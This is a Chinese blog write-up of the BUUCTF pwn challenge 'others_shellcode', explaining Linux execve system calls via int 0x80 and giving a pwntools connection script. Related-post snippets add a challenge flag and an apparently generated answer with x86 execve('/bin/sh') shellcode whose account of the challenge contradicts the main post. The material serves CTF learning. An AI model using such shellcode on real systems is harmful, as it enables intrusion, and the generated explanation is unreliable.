[BUUCTF-pwn]——others_shellcode

最新推荐文章于 2025-05-19 23:44:53 发布
最新推荐文章于 2025-05-19 23:44:53 发布
阅读量1.7k 收藏 4
点赞数 8
CC 4.0 BY-SA版权
分类专栏: # BUUCTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Y_peak/article/details/113796043
本文介绍了如何通过IDA Pro分析并利用int80汇编指令在BuUCTF-pwn挑战中,利用execve系统调用实现shellcode获取shell的过程,包括检查保护措施、理解系统调用号和参数传递方式。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

[BUUCTF-pwn]——others_shellcode

peak 小知识

写这道题之前, 大家首先要了解, 想要获得一个shell, 除了system("/bin/sh") 以外, 还有一种更好的方法, 就是系统调用中的 execve("/bin/sh", NULL, NULL)获得shell。我们可以在 Linxu系统调用号表 中找到对应的系统调用号,进行调用, 其中32位程序系统调用号用 eax 储存, 第一 、 二 、 三参数分别在 ebx 、ecx 、edx中储存。 可以用 int 80 汇编指令调用。64位程序系统调用号用 rax 储存, 第一 、 二 、 三参数分别在 rdi 、rsi 、rdx中储存。 可以用 syscall 汇编指令调用。

言归正传,我们来看看这道题
先checksec一下, 没什么32位程序,开启了NX保护
在这里插入图片描述
在IDA中,看蒙了。之前没遇到过。连个输出都没有,注意到getshell函数上面的result变量 旁边的 eax。函数名叫getshell肯定是暗示在这里进行获得shell的。
在这里插入图片描述
在这里插入图片描述
在汇编中看看, 嘶发现有 int 80 指令。eax = 0FFFFFFFFh - 0FFFFFFF4h = 11。看上面函数也发现result也就是eax的值就是11
在这里插入图片描述
看下Linxu系统调用号表 11对应的就是 execve 可是ebx ecx edx的参数怎么办。
在这里插入图片描述
秉承着走一步写一步的想法。一运行竟然可以, 孩子也是吐了。完全不知道这道题考的什么, 不过多执行试试这个习惯还是很好的,就比如这次, 不就莫名其妙成功了嘛。

exploit

from pwn import *
p = remote('nde3.buuoj.cn', 28531)                                                                       
p.interactive()

希望能够找到ebx ecx edx寄存器对应参数的大佬, 可以在评论里面指教一下。我个人觉得pwndbg肯定可以查看,但是我的pwndbg最近有点问题。看看大佬们有没有其他方法。

CTF-PWN-buuctf-others_shellcode-系统int80调用的使用方法
serfend's blog
04-24 1733
CTF-PWN 来源:https://buuoj.cn/challenges 内容: 附件:https://pan.baidu.com/s/1twNiCnqBL17_WuQr1NdGBQ?pwd=g9by 提取码:g9by 答案:flag{d07d7b41-1672-4338-a72c-43e12c26c587} 总体思路 这题是一道32位系统调用的教学题 [CTF pwn]傻傻分不清的execve、int80、syscall、system及shellcode 详细步骤 查看文件信息 in
BUUCTF-pwn2_sctf_2016
weixin_44145820的博客
03-06 1119
这题利用的是负数转无符号数造成缓冲区溢出,以及泄露libc基地址执行ROP 题目分析 由于NX开启,我们考虑使用ROP,Canary没有打开使得这题变得很方便 下面是vuln函数: 在该函数中,程序读入一个字符串并转化为带符号整形(signed int),这时,如果我们输入负数可以避开不能大于32的检查 在get_n函数中,读入长度被强制转换为unsigned int,此时-1变成了42949...
[BUUCTF]PWN——others_shellcode
mcmuyanga的博客
10-24 948
others_shellcode 附件 解题步骤: 例行检查,32位程序,开启了NX(堆栈不可执行)和PIE(地址随机化)双重保护 试运行了一下,发现直接就能执行shell的命令 远程连接运行一下,直接就获取到了flag 一道简单的shelllcode的直接利用 ...
BUUCTF PWN刷题笔记(持续更新!!)
最新发布
wlmt666的博客
05-19 1065
64位,没有开启保护。点进去没发现明显的漏洞函数,考虑泄露libc基地址的rop构造。先看看有多少gadget估计也够用了。puts函数只接受一个参数,观看汇编看看用的哪个寄存器传输的参数。用的是edi。但是我们怎么找到so的版本呢,因为我们必须要知道so文件种puts函数的偏移量,才可以和泄露出puts的地址结合找到基址。可以用LibcSearch模块来搜索。libcsearch(符号,地址)新的心得:1.64位有效地址是6字节。2.libc.dump是LibcSearch的内置函数。
Finding system calls
farmwang的专栏
07-26 447
/usr/include/asm/unistd.h #ifndef _ASM_X86_UNISTD_64_H #define _ASM_X86_UNISTD_64_H 1 #define __NR_read 0 #define __NR_write 1 #define __NR_open 2 #define __NR_close 3 #define __NR_stat 4 #defin
BUUCTFPWNothers_shellcode
m0_55368674的博客
01-13 316
BUUCTF other_shellcode题解
others_shellcode[BUUCTF]
moonlightsunshin的博客
05-07 724
在 x86 架构的 32 位模式下,int 0x80 是一个软件中断指令,用于从用户空间调用内核空间的服务,即 Linux 系统调用。这个指令会触发一个异常,将控制权传递给内核的异常处理程序,该程序会解析由用户空间代码设置的系统调用号和参数,并执行相应的内核服务。然而,需要注意的是,在 x86-64(也称为 AMD64)架构的 64 位模式下,Linux 采用了不同的系统调用机制。寄存器中,参数则根据系统调用的不同而有所变化,但通常也会存储在寄存器中。指令时,系统调用号通常存储在。寄存器,将参数按照约。
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwnshellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.youkuaiyun.com/A951860555/article/details/110350773
others_shellcode
、moddemod
06-26 728
这题我也不知道要表达什么,上一题还是堆题,这有点突兀… 就32位的int 80系统调用,eax存放系统调用号,只是这里搞了一下,sub相减后就是11,就是execve,参数上面已经push了,直接就获得一个shell… from pwn import * p = remote('nde3.buuoj.cn', 27909) p.interactive() .
BUU刷题-Pwn-others_shellcode
一个啥也不会的小菜鸡!
08-10 288
系统调用号,nc即可获得shell。
buuctf|pwn-others_shellcode-wp
l2645470582_的博客
11-09 225
1.例行检查保护机制 2.我们用32位的IDA打开该文件 shift+f12查找关键字符串,没有看到有用的字符串 3.我们进入main函数看看 我们进入第一个函数看看,没看到什么有用的信息 我们再进入第二个函数看看,我们看到了熟悉的身影 除此之外我们并没有看到什么有用的信息 4.EXP 我们先试试用nc能不能打通,因为getShell()函数里面有权限 nc node4.buuoj.cn 28625 ...
others_shellcode wp (python3)(含getshell过程详解)
Kata_Jhin的博客
03-19 334
others_shellcode wp (python3)(含getshell过程详解)
Buuctfpwn
qq_53809201的博客
05-07 766
1.pwn1 from pwn import * log_level = 'debug' elf = ELF("./pwn1") local = 0 if local: r = process("./pwn1") else: r = remote("node4.buuoj.cn",29317) bin_sh = 0x000000000040118A system_addr = 0x0000000000401191 payload = b'a'*0x0F + p64(system_addr) +
BUUCTF pwn
L0g1c的博客
01-30 1834
第一道: 第一步:连接nc靶场 第二步:连接靶场后,执行 ls 命令,展示该靶场下目录文件。 第三步:里有个 flag文件 使用 cat命令进行查看。 得到flag
BUUCTF-pwn[1]
ca1m4n的博客
10-04 821
PWN手的间歇性记录 ret2text ret2text 首先checksec一下 32位 只开启了栈可执行保护 ida打开 查找/bin/sh binsh = 0x804863A 距离ebp的距离需要利用Ubuntu中gdb工具 gdb ./ret2text 因为存储读入的变量和到栈底的距离未知所以断点下在_gets b *0x80486AE 别忘了再按r,报错不用管 借助变量s到esp的距离计算出s的地址 再计算变量s到esp的距离 用Python: ebp = 0xffffcfd8 e
BUUCTF-others_shellcode
03-26
### BUUCTF Others Shellcode 题目解题思路 BUUCTF中的`Others_Shellcode`是一道典型的PWN类题目,主要考察选手对于Shellcode编写以及Linux环境下的漏洞利用能力。以下是关于该题目的核心解题思路: #### 一、题目背景与目标 此题目提供了一个可执行程序文件,其功能是读取用户输入并尝试运行特定指令。然而,由于存在某些安全机制未启用(如NX位关闭),攻击者可以注入自定义的Shellcode来实现任意命令执行。 通过分析可知,目标是要构造一段能够绕过现有防护措施的有效载荷(shellcode),最终达到获取flag的目的[^1]。 #### 二、具体技术细节解析 1. **逆向工程** 使用工具如Ghidra或者Radare2对给定二进制文件进行静态反汇编分析,确认入口点函数逻辑及其调用链路情况;同时也要注意查看是否有其他隐藏的功能模块被触发的可能性。 2. **确定ROP Gadget** 如果发现保护机制开启了部分控制流完整性验证,则可能需要用到Return-Oriented Programming (ROP) 技巧构建新的执行流程路径。这一步骤涉及查找合适的gadgets组合形成所需的系统调用序列。 3. **编写Shellcode** 基于上述准备好的信息,按照实际需求定制化设计payload内容。考虑到不同架构下寄存器分配规则差异等因素,在撰写过程中需格外小心处理字节顺序等问题以免引起错误行为发生。 4. **测试与调试** 利用QEMU模拟真实机器环境下多次试验调整直至成功完成挑战为止。期间还可以借助strace跟踪进程活动状况以便更好地理解整个交互过程的工作原理。 ```python from pwn import * context.arch = 'i386' shellcode = asm(''' xor eax, eax # 清零EAX 寄存器 push eax # 将 NULL 推入堆栈作为字符串终止符 # 此处创建 "/bin/sh\x00" 的一部分 push 0x68732f6e # hs/n push 0x69622f2f # ib// mov ebx, esp # EBX -> 参数1: 文件名指针 ("//bin/sh") cdq # EDX <- EAX 扩展成双字长形式 (清零EDX) # DX 是第二个参数,这里不需要设置任何东西 mov ecx, edx # ECX <- 第三个参数也是NULL mov al, 0xb # AL 设置为syscall编号 execve() int 0x80 # 发起中断请求操作系统服务 ''') p = process('./vuln') p.sendline(shellcode) log.success(f'Shellcode Sent! Waiting for shell...') p.interactive() ``` 以上脚本展示了如何生成适用于Intel x86体系结构的一个简单execve("/bin/sh", ...) 调用样例,并发送至服务器端等待响应。 --- ###
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值